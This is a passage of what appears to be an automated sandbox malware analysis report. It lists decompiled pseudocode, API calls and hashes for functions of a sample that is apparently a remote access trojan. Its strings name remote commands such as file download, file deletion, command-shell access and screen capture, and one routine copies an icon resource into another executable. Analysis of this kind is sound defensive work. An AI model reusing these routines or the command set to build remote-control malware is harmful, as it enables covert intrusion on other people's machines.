                                                                                                                                                                                                                            0x00402dc4
                                                                                                                                                                                                                            0x00402dc4
                                                                                                                                                                                                                            0x00402dc9
                                                                                                                                                                                                                            0x00402dc9
                                                                                                                                                                                                                            0x00402dd0
                                                                                                                                                                                                                            0x00402dd7
                                                                                                                                                                                                                            0x00402de2
                                                                                                                                                                                                                            0x00402ea0
                                                                                                                                                                                                                            0x00402ea7
                                                                                                                                                                                                                            0x00402eae
                                                                                                                                                                                                                            0x00402eb7
                                                                                                                                                                                                                            0x00402ec3
                                                                                                                                                                                                                            0x00402ecb
                                                                                                                                                                                                                            0x00402ec5
                                                                                                                                                                                                                            0x00402ecb
                                                                                                                                                                                                                            0x00402ecb
                                                                                                                                                                                                                            0x00402eb9
                                                                                                                                                                                                                            0x00402ecb
                                                                                                                                                                                                                            0x00402ecb
                                                                                                                                                                                                                            0x00402ed3
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00402ed5
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00402de8
                                                                                                                                                                                                                            0x00402df8
                                                                                                                                                                                                                            0x00402e00
                                                                                                                                                                                                                            0x00402f0e
                                                                                                                                                                                                                            0x00402f0e
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00402f14
                                                                                                                                                                                                                            0x00402e06
                                                                                                                                                                                                                            0x00402e0e
                                                                                                                                                                                                                            0x00402ed7
                                                                                                                                                                                                                            0x00402edd
                                                                                                                                                                                                                            0x00402ef6
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00402ef6
                                                                                                                                                                                                                            0x00402ee1
                                                                                                                                                                                                                            0x00402ee8
                                                                                                                                                                                                                            0x00402efc
                                                                                                                                                                                                                            0x00402f01
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00402f07
                                                                                                                                                                                                                            0x00402eed
                                                                                                                                                                                                                            0x00402eef
                                                                                                                                                                                                                            0x00402eef
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00402eed
                                                                                                                                                                                                                            0x00402e14
                                                                                                                                                                                                                            0x00402e21
                                                                                                                                                                                                                            0x00402e22
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00402e28
                                                                                                                                                                                                                            0x00402e2d
                                                                                                                                                                                                                            0x00402e2f
                                                                                                                                                                                                                            0x00402e2f
                                                                                                                                                                                                                            0x00402e3e
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00402e44
                                                                                                                                                                                                                            0x00402e59
                                                                                                                                                                                                                            0x00402e5e
                                                                                                                                                                                                                            0x00402e60
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00402e66
                                                                                                                                                                                                                            0x00402e68
                                                                                                                                                                                                                            0x00402e74
                                                                                                                                                                                                                            0x00402e88
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00402e98
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00402e98
                                                                                                                                                                                                                            0x00402e88
                                                                                                                                                                                                                            0x00402e76
                                                                                                                                                                                                                            0x00402e76
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00402e68
                                                                                                                                                                                                                            0x00402e3e

                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            • CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000080,00000000), ref: 00402DF8
                                                                                                                                                                                                                            • GetFileSize.KERNEL32(?,00000000,00000000,80000000,00000001,00000000,00000003,00000080,00000000), ref: 00402E1C
                                                                                                                                                                                                                            • SetFilePointer.KERNEL32(?,-00000080,00000000,00000000,?,00000000,00000000,80000000,00000001,00000000,00000003,00000080,00000000), ref: 00402E38
                                                                                                                                                                                                                            • ReadFile.KERNEL32(?,?,00000080,?,00000000,00000000,?,-00000080,00000000,00000000,?,00000000,00000000,80000000,00000001,00000000), ref: 00402E59
                                                                                                                                                                                                                            • SetFilePointer.KERNEL32(?,00000000,00000000,00000002), ref: 00402E82
                                                                                                                                                                                                                            • SetEndOfFile.KERNEL32(?,?,00000000,00000000,00000002), ref: 00402E90
                                                                                                                                                                                                                            • GetStdHandle.KERNEL32(000000F5), ref: 00402ECB
                                                                                                                                                                                                                            • GetFileType.KERNEL32(?,000000F5), ref: 00402EE1
                                                                                                                                                                                                                            • CloseHandle.KERNEL32(?,?,000000F5), ref: 00402EFC
                                                                                                                                                                                                                            • GetLastError.KERNEL32(000000F5), ref: 00402F14
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000006.00000002.286644380.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000006.00000002.286640242.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000006.00000002.286711673.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000006.00000002.286719148.00000000004A5000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_6_2_400000_uniformerede.jbxd
                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: File$HandlePointer$CloseCreateErrorLastReadSizeType
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID: 1694776339-0
                                                                                                                                                                                                                            • Opcode ID: 8861dfc536feb275602d3633a0ce4d7dcd0f803c1f99ce0a386a22b5fd57de5a
                                                                                                                                                                                                                            • Instruction ID: 9aa9312da4e91c771af0b4e33a38407941ada986436eec9a0907e2913daab745
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 8861dfc536feb275602d3633a0ce4d7dcd0f803c1f99ce0a386a22b5fd57de5a
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 31418C30140701AAE730AF24CA4DB6775A5AF00754F208E3FE5A6BA6E0D7FD9841979D
                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                            Function 00473930 Relevance: 15.1, APIs: 10, Instructions: 108fileCOMMON
                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                            C-Code - Quality: 100%
                                                                                                                                                                                                                            			E00473930(CHAR* __eax, CHAR* __edx) {
				void _v40;
				void* _v44;
				long _v48;
				char _v52;
				CHAR* _v56;
				long _t60;
				void* _t64;
				void* _t65;
				void* _t66;
				void* _t67;

				_v56 = __edx;
				_v52 = 0;
				_t66 = CreateFileA(__eax, 0x80000000, 1, 0, 3, 0x80, 0);
				if(_t66 > 0) {
					ReadFile(_t66,  &_v40, 0x16,  &_v48, 0);
					SetFilePointer(_t66, 0, 0, 0);
					_t65 = E0040275C(0x26);
					_t64 = E0040275C(0x22);
					_t59 = _t65;
					ReadFile(_t66, _t65, 0x26,  &_v48, 0);
					E004029DC(_t59, 0x14, _t64);
					 *((intOrPtr*)(_t64 + 6)) =  *((intOrPtr*)(_t65 + 6));
					 *((intOrPtr*)(_t64 + 0xa)) =  *((intOrPtr*)(_t65 + 0xa));
					 *(_t64 + 0xe) =  *(_t65 + 0xe);
					 *((short*)(_t64 + 0x12)) = 1;
					_t60 =  *(_t65 + 0xe);
					_v44 = E0040275C(_t60);
					SetFilePointer(_t66,  *(_t65 + 0x12), 0, 0);
					ReadFile(_t66, _v44, _t60,  &_v48, 0);
					CloseHandle(_t66);
					_t67 = BeginUpdateResourceA(_v56, 0);
					if(_t67 > 0) {
						UpdateResourceA(_t67, 3, 1, 0, _v44, _t60);
						EndUpdateResourceA(_t67, 0);
						_v52 = 1;
					}
					E0040277C(_v44);
					E0040277C(_t64);
					E0040277C(_t65);
				}
				return _v52;
			}













                                                                                                                                                                                                                            0x00473937
                                                                                                                                                                                                                            0x0047393a
                                                                                                                                                                                                                            0x00473957
                                                                                                                                                                                                                            0x0047395b
                                                                                                                                                                                                                            0x00473970
                                                                                                                                                                                                                            0x0047397c
                                                                                                                                                                                                                            0x0047398b
                                                                                                                                                                                                                            0x00473997
                                                                                                                                                                                                                            0x004739a2
                                                                                                                                                                                                                            0x004739a6
                                                                                                                                                                                                                            0x004739b4
                                                                                                                                                                                                                            0x004739bc
                                                                                                                                                                                                                            0x004739c2
                                                                                                                                                                                                                            0x004739c8
                                                                                                                                                                                                                            0x004739cb
                                                                                                                                                                                                                            0x004739d1
                                                                                                                                                                                                                            0x004739db
                                                                                                                                                                                                                            0x004739e8
                                                                                                                                                                                                                            0x004739fb
                                                                                                                                                                                                                            0x00473a01
                                                                                                                                                                                                                            0x00473a12
                                                                                                                                                                                                                            0x00473a16
                                                                                                                                                                                                                            0x00473a25
                                                                                                                                                                                                                            0x00473a2d
                                                                                                                                                                                                                            0x00473a32
                                                                                                                                                                                                                            0x00473a32
                                                                                                                                                                                                                            0x00473a3b
                                                                                                                                                                                                                            0x00473a42
                                                                                                                                                                                                                            0x00473a49
                                                                                                                                                                                                                            0x00473a49
                                                                                                                                                                                                                            0x00473a59

                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            • CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000080,00000000), ref: 00473952
                                                                                                                                                                                                                            • ReadFile.KERNEL32(00000000,?,00000016,?,00000000,00000000,80000000,00000001,00000000,00000003,00000080,00000000), ref: 00473970
                                                                                                                                                                                                                            • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000016,?,00000000,00000000,80000000,00000001,00000000,00000003,00000080,00000000), ref: 0047397C
                                                                                                                                                                                                                            • ReadFile.KERNEL32(00000000,00000000,00000026,?,00000000,00000000,00000000,00000000,00000000,00000000,?,00000016,?,00000000,00000000,80000000), ref: 004739A6
                                                                                                                                                                                                                            • SetFilePointer.KERNEL32(00000000,?,00000000,00000000,00000000,00000000,00000026,?,00000000,00000000,00000000,00000000,00000000,00000000,?,00000016), ref: 004739E8
                                                                                                                                                                                                                            • ReadFile.KERNEL32(00000000,?,?,?,00000000,00000000,?,00000000,00000000,00000000,00000000,00000026,?,00000000,00000000,00000000), ref: 004739FB
                                                                                                                                                                                                                            • CloseHandle.KERNEL32(00000000,00000000,?,?,?,00000000,00000000,?,00000000,00000000,00000000,00000000,00000026,?,00000000,00000000), ref: 00473A01
                                                                                                                                                                                                                            • BeginUpdateResourceA.KERNEL32 ref: 00473A0D
                                                                                                                                                                                                                            • UpdateResourceA.KERNEL32 ref: 00473A25
                                                                                                                                                                                                                            • EndUpdateResourceA.KERNEL32 ref: 00473A2D
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000006.00000002.286644380.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000006.00000002.286640242.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000006.00000002.286711673.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000006.00000002.286719148.00000000004A5000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_6_2_400000_uniformerede.jbxd
                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: File$ReadResourceUpdate$Pointer$BeginCloseCreateHandle
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID: 2954177348-0
                                                                                                                                                                                                                            • Opcode ID: b3c417beb733bcad9e80f08033d85762bfb7f3f1641e04f9420e66906a9e60b8
                                                                                                                                                                                                                            • Instruction ID: bc58bece930a9ee3c191066ba21d3152ea947465ec18ce8fe9039474e398f891
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: b3c417beb733bcad9e80f08033d85762bfb7f3f1641e04f9420e66906a9e60b8
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: A33147707443057EE210EB598C46F6BB7DC9F44704F00442EBA59EB2C2D6B9F904976E
                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                            Function 00455F20 Relevance: 15.1, APIs: 10, Instructions: 74windowCOMMON
                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                            C-Code - Quality: 100%
                                                                                                                                                                                                                            			E00455F20(intOrPtr _a4) {
				intOrPtr _t27;
				struct HMENU__* _t48;

				_t27 =  *((intOrPtr*)(_a4 - 4));
				if( *((char*)(_t27 + 0x229)) != 0) {
					_t27 =  *((intOrPtr*)(_a4 - 4));
					if(( *(_t27 + 0x228) & 0x00000001) != 0) {
						_t27 =  *((intOrPtr*)(_a4 - 4));
						if( *((char*)(_t27 + 0x22f)) != 1) {
							_t48 = GetSystemMenu(E00441704( *((intOrPtr*)(_a4 - 4))), 0);
							if( *((char*)( *((intOrPtr*)(_a4 - 4)) + 0x229)) == 3) {
								DeleteMenu(_t48, 0xf130, 0);
								DeleteMenu(_t48, 7, 0x400);
								DeleteMenu(_t48, 5, 0x400);
								DeleteMenu(_t48, 0xf030, 0);
								DeleteMenu(_t48, 0xf020, 0);
								DeleteMenu(_t48, 0xf000, 0);
								return DeleteMenu(_t48, 0xf120, 0);
							}
							if(( *( *((intOrPtr*)(_a4 - 4)) + 0x228) & 0x00000002) == 0) {
								EnableMenuItem(_t48, 0xf020, 1);
							}
							_t27 =  *((intOrPtr*)(_a4 - 4));
							if(( *(_t27 + 0x228) & 0x00000004) == 0) {
								return EnableMenuItem(_t48, 0xf030, 1);
							}
						}
					}
				}
				return _t27;
			}





                                                                                                                                                                                                                            0x00455f27
                                                                                                                                                                                                                            0x00455f31
                                                                                                                                                                                                                            0x00455f3a
                                                                                                                                                                                                                            0x00455f44
                                                                                                                                                                                                                            0x00455f4d
                                                                                                                                                                                                                            0x00455f57
                                                                                                                                                                                                                            0x00455f70
                                                                                                                                                                                                                            0x00455f7f
                                                                                                                                                                                                                            0x00455f89
                                                                                                                                                                                                                            0x00455f96
                                                                                                                                                                                                                            0x00455fa3
                                                                                                                                                                                                                            0x00455fb0
                                                                                                                                                                                                                            0x00455fbd
                                                                                                                                                                                                                            0x00455fca
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00455fd7
                                                                                                                                                                                                                            0x00455feb
                                                                                                                                                                                                                            0x00455ff5
                                                                                                                                                                                                                            0x00455ff5
                                                                                                                                                                                                                            0x00455ffd
                                                                                                                                                                                                                            0x00456007
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00456011
                                                                                                                                                                                                                            0x00456007
                                                                                                                                                                                                                            0x00455f57
                                                                                                                                                                                                                            0x00455f44
                                                                                                                                                                                                                            0x00456018

                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            • GetSystemMenu.USER32(00000000,00000000), ref: 00455F6B
                                                                                                                                                                                                                            • DeleteMenu.USER32(00000000,0000F130,00000000,00000000,00000000), ref: 00455F89
                                                                                                                                                                                                                            • DeleteMenu.USER32(00000000,00000007,00000400,00000000,0000F130,00000000,00000000,00000000), ref: 00455F96
                                                                                                                                                                                                                            • DeleteMenu.USER32(00000000,00000005,00000400,00000000,00000007,00000400,00000000,0000F130,00000000,00000000,00000000), ref: 00455FA3
                                                                                                                                                                                                                            • DeleteMenu.USER32(00000000,0000F030,00000000,00000000,00000005,00000400,00000000,00000007,00000400,00000000,0000F130,00000000,00000000,00000000), ref: 00455FB0
                                                                                                                                                                                                                            • DeleteMenu.USER32(00000000,0000F020,00000000,00000000,0000F030,00000000,00000000,00000005,00000400,00000000,00000007,00000400,00000000,0000F130,00000000,00000000), ref: 00455FBD
                                                                                                                                                                                                                            • DeleteMenu.USER32(00000000,0000F000,00000000,00000000,0000F020,00000000,00000000,0000F030,00000000,00000000,00000005,00000400,00000000,00000007,00000400,00000000), ref: 00455FCA
                                                                                                                                                                                                                            • DeleteMenu.USER32(00000000,0000F120,00000000,00000000,0000F000,00000000,00000000,0000F020,00000000,00000000,0000F030,00000000,00000000,00000005,00000400,00000000), ref: 00455FD7
                                                                                                                                                                                                                            • EnableMenuItem.USER32 ref: 00455FF5
                                                                                                                                                                                                                            • EnableMenuItem.USER32 ref: 00456011
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000006.00000002.286644380.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000006.00000002.286640242.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000006.00000002.286711673.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000006.00000002.286719148.00000000004A5000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_6_2_400000_uniformerede.jbxd
                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: Menu$Delete$EnableItem$System
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID: 3985193851-0
                                                                                                                                                                                                                            • Opcode ID: 46a722b8eeeea243d78a8bad53259dfb526ef96efbc8dad51e559871ae0294e4
                                                                                                                                                                                                                            • Instruction ID: b5346b1c8bd95bffcca62109fe31ea1f8cc395b33158847c9b815f432f914529
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 46a722b8eeeea243d78a8bad53259dfb526ef96efbc8dad51e559871ae0294e4
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 91215E707C53047AE320DB64CD8EFA97AD95B14B1AF1450A5BA447F6D3C6BCFA80861C
                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                            Function 004214B8 Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 109threadCOMMON
                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                            C-Code - Quality: 67%
                                                                                                                                                                                                                            			E004214B8(void* __eax, void* __ebx, void* __edi, void* __esi) {
				char _v5;
				intOrPtr* _v12;
				long _v16;
				char _v20;
				char _v24;
				long _t22;
				char _t29;
				void* _t53;
				intOrPtr _t61;
				intOrPtr* _t62;
				intOrPtr _t63;
				intOrPtr _t66;
				intOrPtr _t67;
				void* _t72;
				void* _t73;
				intOrPtr _t74;

				_t72 = _t73;
				_t74 = _t73 + 0xffffffec;
				_push(__esi);
				_push(__edi);
				_t53 = __eax;
				_t22 = GetCurrentThreadId();
				_t62 =  *0x49de40; // 0x49e034
				if(_t22 !=  *_t62) {
					_v24 = GetCurrentThreadId();
					_v20 = 0;
					_t61 =  *0x49dbc8; // 0x41744c
					E0040D23C(_t53, _t61, 1, __edi, __esi, 0,  &_v24);
					E00404378();
				}
				if(_t53 <= 0) {
					E0042146C();
				} else {
					E00421478(_t53);
				}
				_v16 = 0;
				_push(0x49e86c);
				L00406FE0();
				_push(_t72);
				_push(0x421646);
				_push( *[fs:eax]);
				 *[fs:eax] = _t74;
				_v16 = InterlockedExchange( &E0049B5C4, _v16);
				_push(_t72);
				_push(0x421627);
				_push( *[fs:eax]);
				 *[fs:eax] = _t74;
				if(_v16 == 0 ||  *((intOrPtr*)(_v16 + 8)) <= 0) {
					_t29 = 0;
				} else {
					_t29 = 1;
				}
				_v5 = _t29;
				if(_v5 == 0) {
					L14:
					_pop(_t63);
					 *[fs:eax] = _t63;
					_push(E0042162E);
					return E00403BEC(_v16);
				} else {
					if( *((intOrPtr*)(_v16 + 8)) > 0) {
						_v12 = E0041AC6C(_v16, 0);
						E0041AB5C(_v16, 0);
						L004071A0();
						 *[fs:eax] = _t74;
						 *[fs:eax] = _t74;
						 *((intOrPtr*)( *_v12 + 8))( *[fs:eax], _t72,  *[fs:eax], 0x4215f1, _t72, 0x49e86c);
						_pop(_t66);
						 *[fs:eax] = _t66;
						_t67 = 0x4215c2;
						 *[fs:eax] = _t67;
						_push(E004215F8);
						_push(0x49e86c);
						L00406FE0();
						return 0;
					} else {
						goto L14;
					}
				}
			}



















                                                                                                                                                                                                                            0x004214b9
                                                                                                                                                                                                                            0x004214bb
                                                                                                                                                                                                                            0x004214bf
                                                                                                                                                                                                                            0x004214c0
                                                                                                                                                                                                                            0x004214c1
                                                                                                                                                                                                                            0x004214c3
                                                                                                                                                                                                                            0x004214c8
                                                                                                                                                                                                                            0x004214d0
                                                                                                                                                                                                                            0x004214d7
                                                                                                                                                                                                                            0x004214da
                                                                                                                                                                                                                            0x004214e4
                                                                                                                                                                                                                            0x004214f1
                                                                                                                                                                                                                            0x004214f6
                                                                                                                                                                                                                            0x004214f6
                                                                                                                                                                                                                            0x004214fd
                                                                                                                                                                                                                            0x00421508
                                                                                                                                                                                                                            0x004214ff
                                                                                                                                                                                                                            0x00421501
                                                                                                                                                                                                                            0x00421501
                                                                                                                                                                                                                            0x0042150f
                                                                                                                                                                                                                            0x00421512
                                                                                                                                                                                                                            0x00421517
                                                                                                                                                                                                                            0x0042151e
                                                                                                                                                                                                                            0x0042151f
                                                                                                                                                                                                                            0x00421524
                                                                                                                                                                                                                            0x00421527
                                                                                                                                                                                                                            0x00421538
                                                                                                                                                                                                                            0x0042153d
                                                                                                                                                                                                                            0x0042153e
                                                                                                                                                                                                                            0x00421543
                                                                                                                                                                                                                            0x00421546
                                                                                                                                                                                                                            0x0042154d
                                                                                                                                                                                                                            0x00421558
                                                                                                                                                                                                                            0x0042155c
                                                                                                                                                                                                                            0x0042155c
                                                                                                                                                                                                                            0x0042155c
                                                                                                                                                                                                                            0x0042155e
                                                                                                                                                                                                                            0x00421565
                                                                                                                                                                                                                            0x00421611
                                                                                                                                                                                                                            0x00421613
                                                                                                                                                                                                                            0x00421616
                                                                                                                                                                                                                            0x00421619
                                                                                                                                                                                                                            0x00421626
                                                                                                                                                                                                                            0x0042156b
                                                                                                                                                                                                                            0x0042160b
                                                                                                                                                                                                                            0x0042157a
                                                                                                                                                                                                                            0x00421582
                                                                                                                                                                                                                            0x0042158c
                                                                                                                                                                                                                            0x0042159c
                                                                                                                                                                                                                            0x004215aa
                                                                                                                                                                                                                            0x004215b5
                                                                                                                                                                                                                            0x004215ba
                                                                                                                                                                                                                            0x004215bd
                                                                                                                                                                                                                            0x004215db
                                                                                                                                                                                                                            0x004215de
                                                                                                                                                                                                                            0x004215e1
                                                                                                                                                                                                                            0x004215e6
                                                                                                                                                                                                                            0x004215eb
                                                                                                                                                                                                                            0x004215f0
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x0042160b

                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            • GetCurrentThreadId.KERNEL32 ref: 004214C3
                                                                                                                                                                                                                            • GetCurrentThreadId.KERNEL32 ref: 004214D2
                                                                                                                                                                                                                              • Part of subcall function 0042146C: ResetEvent.KERNEL32(00000220,0042150D,?,?,00000000), ref: 00421472
                                                                                                                                                                                                                            • RtlEnterCriticalSection.KERNEL32(0049E86C,?,?,00000000), ref: 00421517
                                                                                                                                                                                                                            • InterlockedExchange.KERNEL32(0049B5C4,?), ref: 00421533
                                                                                                                                                                                                                            • RtlLeaveCriticalSection.KERNEL32(0049E86C,00000000,00421627,?,00000000,00421646,?,0049E86C,?,?,00000000), ref: 0042158C
                                                                                                                                                                                                                            • RtlEnterCriticalSection.KERNEL32(0049E86C,004215F8,00421627,?,00000000,00421646,?,0049E86C,?,?,00000000), ref: 004215EB
                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000006.00000002.286644380.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000006.00000002.286640242.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000006.00000002.286711673.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000006.00000002.286719148.00000000004A5000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_6_2_400000_uniformerede.jbxd
                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: CriticalSection$CurrentEnterThread$EventExchangeInterlockedLeaveReset
                                                                                                                                                                                                                            • String ID: 4I$LtA
                                                                                                                                                                                                                            • API String ID: 2189153385-4143330910
                                                                                                                                                                                                                            • Opcode ID: 9df671befd0559164bdf9a2b2f9f914a41e4678e38533ce31647a3c6e0478cce
                                                                                                                                                                                                                            • Instruction ID: c7144f3b078a98dbb88dc3215a2fca8a3d1431468ba3915c2d0e15c961d82a4d
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 9df671befd0559164bdf9a2b2f9f914a41e4678e38533ce31647a3c6e0478cce
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: DA31EA30B04204BFD711DF65E852A6D7BF8EB59704F9184B7F401932A1D77D9D40CA29
                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                            Function 00495BD4 Relevance: 14.1, APIs: 1, Strings: 7, Instructions: 105threadCOMMON
                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000006.00000002.286644380.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000006.00000002.286640242.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000006.00000002.286711673.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000006.00000002.286719148.00000000004A5000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_6_2_400000_uniformerede.jbxd
                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: CreateThread
                                                                                                                                                                                                                            • String ID: CheckMe$DeleteFile$DownloadFile$GetCMDAccess$GetScreenImage$ListDir$ListDisk
                                                                                                                                                                                                                            • API String ID: 2422867632-2040281516
                                                                                                                                                                                                                            • Opcode ID: b8b8442999d8b82ff34f09aae518beeab9395ee6e2a7bec9604896c991f417c9
                                                                                                                                                                                                                            • Instruction ID: cc4d067afddf7cdfb89c5fbb3b31213d9db14bacd25ac7606a572a3bc3506bde
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: b8b8442999d8b82ff34f09aae518beeab9395ee6e2a7bec9604896c991f417c9
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: D131CF30710A049BCF12EBA5DC46A1A7BB4EF89714B70867BF600D77A1CA3CAD09871C
                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                            Function 0040D058 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 56filewindowCOMMON
                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                            C-Code - Quality: 100%
                                                                                                                                                                                                                            			E0040D058(void* __edx, void* __edi, void* __fp0) {
				void _v1024;
				char _v1088;
				long _v1092;
				void* _t12;
				char* _t14;
				intOrPtr _t16;
				intOrPtr _t18;
				intOrPtr _t24;
				long _t32;

				E0040CED0(_t12,  &_v1024, __edx, __fp0, 0x400);
				_t14 =  *0x49dc84; // 0x49e04c
				if( *_t14 == 0) {
					_t16 =  *0x49d864; // 0x407db4
					_t9 = _t16 + 4; // 0xffd2
					_t18 =  *0x49e668; // 0x400000
					LoadStringA(E00405FDC(_t18),  *_t9,  &_v1088, 0x40);
					return MessageBoxA(0,  &_v1024,  &_v1088, 0x2010);
				}
				_t24 =  *0x49d8f8; // 0x49e21c
				E004028C4(E00402FCC(_t24));
				CharToOemA( &_v1024,  &_v1024);
				_t32 = E00409F88( &_v1024, __edi);
				WriteFile(GetStdHandle(0xfffffff4),  &_v1024, _t32,  &_v1092, 0);
				return WriteFile(GetStdHandle(0xfffffff4), 0x40d11c, 2,  &_v1092, 0);
			}












                                                                                                                                                                                                                            0x0040d067
                                                                                                                                                                                                                            0x0040d06c
                                                                                                                                                                                                                            0x0040d074
                                                                                                                                                                                                                            0x0040d0db
                                                                                                                                                                                                                            0x0040d0e0
                                                                                                                                                                                                                            0x0040d0e4
                                                                                                                                                                                                                            0x0040d0ef
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x0040d105
                                                                                                                                                                                                                            0x0040d076
                                                                                                                                                                                                                            0x0040d080
                                                                                                                                                                                                                            0x0040d08f
                                                                                                                                                                                                                            0x0040d09f
                                                                                                                                                                                                                            0x0040d0b2
                                                                                                                                                                                                                            0x00000000

                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                              • Part of subcall function 0040CED0: VirtualQuery.KERNEL32(?,?,0000001C), ref: 0040CEED
